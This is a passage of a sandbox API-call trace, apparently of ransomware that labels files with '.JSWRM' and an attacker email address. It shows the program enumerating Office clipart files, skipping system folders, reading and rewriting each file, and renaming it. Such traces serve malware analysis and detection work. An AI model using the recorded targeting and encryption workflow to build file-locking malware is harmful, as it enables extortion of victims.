lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0087.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0087.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0087.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0087.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0087.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0087.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0087.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0087.986] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0087.987] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xec210f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x244a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215709.WMF", cAlternateFileName="")) returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2=".") returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="..") returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="...") returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="windows") returned -1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="recovery") returned -1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="perflogs") returned -1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="documents and settings") returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="system volume information") returned -1 [0087.987] lstrcmpiW (lpString1="J0215709.WMF", lpString2="msocache") returned -1 [0087.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0087.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215709.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215709.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215709.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0087.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0087.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215709.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215709.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215709.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0087.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0087.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0087.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.989] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9290) returned 1 [0087.989] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2440) returned 0x24d210 [0087.989] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2440, lpOverlapped=0x0) returned 1 [0087.992] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.992] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2440, lpOverlapped=0x0) returned 1 [0087.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.992] CloseHandle (hObject=0x314) returned 1 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0087.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0087.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0087.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0087.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0087.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.992] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215709.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215709.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0087.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0087.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0087.993] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45a2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215710.WMF", cAlternateFileName="")) returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2=".") returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="..") returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="...") returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="windows") returned -1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="recovery") returned -1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="perflogs") returned -1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="documents and settings") returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="system volume information") returned -1 [0087.993] lstrcmpiW (lpString1="J0215710.WMF", lpString2="msocache") returned -1 [0087.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0087.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215710.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215710.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215710.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0087.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0087.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215710.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215710.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215710.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0087.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0087.994] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0087.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.994] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0087.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.994] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17826) returned 1 [0087.994] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.995] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45a0) returned 0x24d210 [0087.995] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45a0, lpOverlapped=0x0) returned 1 [0087.997] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0087.997] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45a0, lpOverlapped=0x0) returned 1 [0087.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0087.997] CloseHandle (hObject=0x314) returned 1 [0087.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0087.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0087.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0087.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0087.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0087.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0087.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0087.998] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0087.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215710.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215710.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0087.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0087.998] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebfae8f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xebfae8f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xebfae8f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15f2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0215718.WMF", cAlternateFileName="")) returned 1 [0087.998] lstrcmpiW (lpString1="J0215718.WMF", lpString2=".") returned 1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="..") returned 1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="...") returned 1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="windows") returned -1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="recovery") returned -1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="perflogs") returned -1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="documents and settings") returned 1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="$RECYCLE.BIN") returned 1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="system volume information") returned -1 [0087.999] lstrcmpiW (lpString1="J0215718.WMF", lpString2="msocache") returned -1 [0087.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215718.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215718.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215718.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215718.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0215718.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0215718.WMF", lpUsedDefaultChar=0x0) returned 12 [0087.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0087.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0087.999] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0087.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0087.999] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0087.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0087.999] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5618) returned 1 [0088.000] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.000] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15f0) returned 0x205850 [0088.000] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x15f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x15f0, lpOverlapped=0x0) returned 1 [0088.002] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.002] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x15f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x15f0, lpOverlapped=0x0) returned 1 [0088.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.002] CloseHandle (hObject=0x314) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0088.002] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0088.002] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0088.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0088.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0088.003] HeapFree (in: 